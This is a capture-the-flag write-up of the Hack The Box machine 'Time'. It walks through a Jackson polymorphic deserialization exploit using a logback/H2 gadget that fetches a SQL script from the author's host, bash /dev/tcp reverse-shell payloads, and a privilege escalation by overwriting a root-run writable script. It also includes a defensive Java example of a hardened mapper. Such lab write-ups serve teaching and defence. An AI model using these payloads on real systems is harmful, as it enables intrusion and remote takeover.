# HTB: Time – Deserialization, Java Shenanigans & Root in Style

<figure><img src="/files/etL8OVWj4oR4HBywgGod" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
*This medium-difficulty HTB box was a great lesson in one thing:*\
**Read the damn error. Then research it like your shell depends on it.**
{% endhint %}

### 🧭 Enumeration

#### 🔍 Nmap Scan

As always, I began with a full enumeration sweep:

```
nmap -Pn -n -A --reason -vvv -oN nmap/00-basic.txt -iL target.txt
```

**Findings:**

* **Port 22**: OpenSSH 8.2p1 (Ubuntu)
* **Port 80**: Apache 2.4.41 hosting a web server titled *"Online JSON Parser"*

### 🕸 Recon

The website was a **JSON beautifier** — harmless-looking, but CTFs don’t give you port 80 unless they want you to do *evil developer things*.

I ran `hakrawler` to check for juicy endpoints:

```
cat url.txt | hakrawler -proxy http://localhost:8080 -subs -d 5 -insecure -s -json >hakrawler.json
```

No admin panel. No hidden paths. But what caught my eye was how it **handled malformed JSON**...

### 💥 Exploitation – Jackson Deserialization RCE

Normal JSON works:

<figure><img src="/files/jGVLfpWiRDPAL8Sf78fQ" alt=""><figcaption></figcaption></figure>

```
{"test":"hello"}
```

But malformed input returned this beauty:

<figure><img src="/files/etL8OVWj4oR4HBywgGod" alt=""><figcaption></figcaption></figure>

> `Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException`
>
> *Expected START\_ARRAY, got START\_OBJECT…*\
> *"need JSON Array to contain As.WRAPPER\_ARRAY type information..."*

**Boom. Jackpot.**\
That’s **Jackson polymorphic deserialization**. `As.WRAPPER_ARRAY` is one of Jackson's type-id inclusion modes: with default typing switched on, the mapper expects `["fully.qualified.ClassName", {...}]` and instantiates whatever class the first element names. The client picks the class, and my "malformed" input was simply missing that wrapper.

<figure><img src="/files/f5NZqoIoH37Jxial7Qnl" alt=""><figcaption></figcaption></figure>

I dug into this article that became my savior:\
🔗 <https://blog.doyensec.com/2019/07/22/jackson-gadgets.html>
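To make the error message concrete, here is an added example of my own. It is not the Time application's code (which I never saw) and not from the Doyensec post: a Jackson mapper configured the vulnerable way next to one that keeps default typing but gates it with a `PolymorphicTypeValidator` allow-list, plus the tree-only path a beautifier actually needs. It assumes jackson-databind 2.10 or later (for `activateDefaultTyping`) and a made-up DTO package `com.example.model`; the inputs are constructed, and the logback class name from the payload is only ever rejected, never loaded with its dependencies.

```java
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingDemo {

    // Constructed inputs: the benign JSON from the box, the same JSON in wrapper-array
    // form naming a harmless class, and the gadget class name (never instantiated here).
    static final String PLAIN   = "{\"test\":\"hello\"}";
    static final String WRAPPED = "[\"java.util.HashMap\", {\"test\":\"hello\"}]";
    static final String GADGET  =
        "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]";

    /** Vulnerable: global default typing in WRAPPER_ARRAY form with no validator. */
    static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        // Deprecated since 2.10 precisely because it takes no PolymorphicTypeValidator.
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.WRAPPER_ARRAY);
        return m;
    }

    /** Hardened: default typing stays on, but only an allow-listed package may be named. */
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.") // assumed name of your own DTO package
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.WRAPPER_ARRAY);
        return m;
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper vuln = vulnerableMapper();

        // 1. A plain object read as Object.class: this is the error the box printed.
        try {
            vuln.readValue(PLAIN, Object.class);
        } catch (JsonProcessingException e) {
            // "... need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object"
            System.out.println("vulnerable, plain:   " + e.getOriginalMessage());
        }

        // 2. Wrapper-array form: the client, not the server, chooses the class.
        Object o = vuln.readValue(WRAPPED, Object.class);
        System.out.println("vulnerable, wrapped: " + o.getClass().getName()); // java.util.HashMap

        // 3. The gadget against the hardened mapper: the type id is refused before any
        //    constructor or setter of the named class can run.
        try {
            hardenedMapper().readValue(GADGET, Object.class);
        } catch (JsonProcessingException e) {
            System.out.println("hardened, gadget:    " + e.getOriginalMessage());
        }

        // 4. A beautifier needs no typing at all: read a tree and pretty-print it.
        JsonNode tree = new ObjectMapper().readTree(PLAIN);
        System.out.println(tree.toPrettyString());
    }
}
```

Compile it with `jackson-databind` and `jackson-annotations` on the classpath; logback and H2 are not needed, which is the point: the hardened mapper never gets as far as touching them. The real fix for a JSON beautifier is case 4, no default typing at all; the validator in case 3 is for code that genuinely needs polymorphic types.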

#### 🧪 Payload Time

The gadget is the one from the Doyensec post: logback's `DriverManagerConnectionSource` opens a JDBC connection to whatever URL its setter receives, and an in-memory H2 URL with `INIT=RUNSCRIPT FROM ...` makes H2 fetch and execute a SQL script from my host (served on port 8000). It only works because both logback and H2 sit on the target's classpath, so a successful callback also confirms those two libraries are present.

```
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.8:8000/inject.sql'"}]
```

* 📄 `inject.sql` – Weaponized

```
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.8/4444 0>&1')
```

Listener on my side, started before the payload is sent:

```
nc -lvnp 4444
```

<figure><img src="/files/05XvGePwRCpZLpaY8whe" alt=""><figcaption></figcaption></figure>

💥 **Reverse shell obtained!**

### 🧍 Local Privilege Escalation – Timer Shenanigans

After running `linpeas`, I found something gold:

* `/usr/bin/timer_backup.sh` runs as root every 10 seconds, and it is writable by my low-privilege user (the next step would not work otherwise).

Overwriting it with a reverse-shell one-liner is enough. Start the listener first; the timer fires within ten seconds. Note that `>` replaces the original script, so root will keep spawning shells at my listener until the file is put back.

```
nc -lvnp 9000
```

```
echo "bash -i >& /dev/tcp/10.10.14.8/9000 0>&1" > /usr/bin/timer_backup.sh
```

📈 Got root. Simple, clean, and elegant.

{% embed url="https://www.hackthebox.com/achievement/machine/409699/286" %}

## References

* <https://github.com/lorenzodegiorgi/jackson-vulnerability>
* <https://github.com/FasterXML/jackson/wiki/Jackson-Polymorphic-Deserialization-CVE-Criteria>
* <https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/>
* <https://www.youtube.com/watch?v=uS37TujnLRw>
* <https://blog.doyensec.com/2019/07/22/jackson-gadgets.html>

## 🧠 Final Thoughts

What made **HTB: Time** stand out wasn’t the difficulty of the exploit. It was the **importance of interpreting Java errors and knowing what to Google.**

➡️ *Lesson:* Sometimes the error **is** the clue.

This box was a smooth ride with:

* 🔍 Deep Java debugging
* 🧬 Deserialization abuse
* 📅 Scheduled script escalation

And that's a wrap! Time box — rooted. ✅

